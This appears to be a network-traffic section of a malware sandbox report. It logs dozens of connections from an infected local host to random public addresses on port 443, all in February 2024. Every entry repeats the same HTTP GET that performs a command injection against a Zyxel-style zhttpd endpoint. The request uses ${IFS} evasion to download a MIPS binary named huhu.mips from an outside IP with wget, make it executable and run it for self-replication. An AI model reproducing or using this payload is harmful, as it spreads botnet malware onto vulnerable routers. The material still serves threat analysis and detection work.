                                                      Feb 2, 2024 06:35:57.733465910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5656192.168.2.144711695.124.180.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733491898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5657192.168.2.1448092220.243.92.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733534098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5658192.168.2.145895068.133.215.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733562946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5659192.168.2.1441204154.184.165.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733613968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5660192.168.2.145288051.84.245.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733655930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5661192.168.2.1437472107.180.92.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733680964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5662192.168.2.145562447.140.230.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733741045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5663192.168.2.144494037.44.47.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733793020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5664192.168.2.1460406116.156.79.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733848095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5665192.168.2.143453080.176.33.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733896971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5666192.168.2.145641872.48.251.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733952045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5667192.168.2.1435592209.33.16.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733978033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5668192.168.2.1446946139.170.192.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734004974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5669192.168.2.145230623.134.145.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734059095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5670192.168.2.1448704135.51.217.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734092951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5671192.168.2.1450158132.32.241.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734129906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5672192.168.2.144505476.155.90.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734175920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5673192.168.2.1447878152.155.31.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734205961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5674192.168.2.145710849.37.36.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734231949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5675192.168.2.145898627.181.194.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734276056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5676192.168.2.1439984183.83.109.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734312057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5677192.168.2.144686019.146.90.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734349012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5678192.168.2.1444888212.176.128.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734375000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5679192.168.2.1437872223.0.43.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734421015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5680192.168.2.1444290111.141.174.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734466076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5681192.168.2.1439870109.199.194.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734500885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5682192.168.2.1449170164.237.61.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.734529018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5683192.168.2.1450634198.116.181.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747178078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5684192.168.2.1454652171.66.251.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747236013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5685192.168.2.1457596176.100.215.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747277975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5686192.168.2.1444670143.64.205.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747324944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5687192.168.2.144063643.243.85.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747380972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5688192.168.2.145500046.117.43.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747414112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5689192.168.2.143937453.74.125.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747478008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5690192.168.2.1435120198.227.152.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747495890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5691192.168.2.145074237.133.239.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747565031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5692192.168.2.1451332217.37.111.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747597933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5693192.168.2.1443866101.23.14.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747638941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5694192.168.2.1446458106.170.69.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747668982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5695192.168.2.144298449.104.186.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747715950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5696192.168.2.1438256119.244.198.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747746944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5697192.168.2.145293841.194.164.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747792959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5698192.168.2.14580045.243.226.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747834921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5699192.168.2.1444920205.207.214.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747865915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5700192.168.2.1437122104.120.170.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747911930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5701192.168.2.1455254154.23.250.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747935057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5702192.168.2.1442038165.63.86.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.747994900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5703192.168.2.1434492135.227.3.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748049974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5704192.168.2.144377280.29.52.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748075008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5705192.168.2.144291476.136.232.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748125076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5706192.168.2.1459044216.210.204.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748171091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5707192.168.2.1441278176.71.144.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748205900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5708192.168.2.1436844219.84.197.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748236895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5709192.168.2.145918837.2.218.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748290062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5710192.168.2.1456268205.194.147.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748334885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5711192.168.2.145558460.222.22.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748353004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5712192.168.2.1440986162.91.176.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748404980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5713192.168.2.1454066109.133.222.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748451948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5714192.168.2.144103671.166.58.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748493910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5715192.168.2.143821889.168.192.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748529911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5716192.168.2.1454788205.57.58.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748564959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5717192.168.2.1448326201.169.122.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.748608112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5718192.168.2.144041868.236.178.71443
                                                      TimestampBytes transferredDirectionData
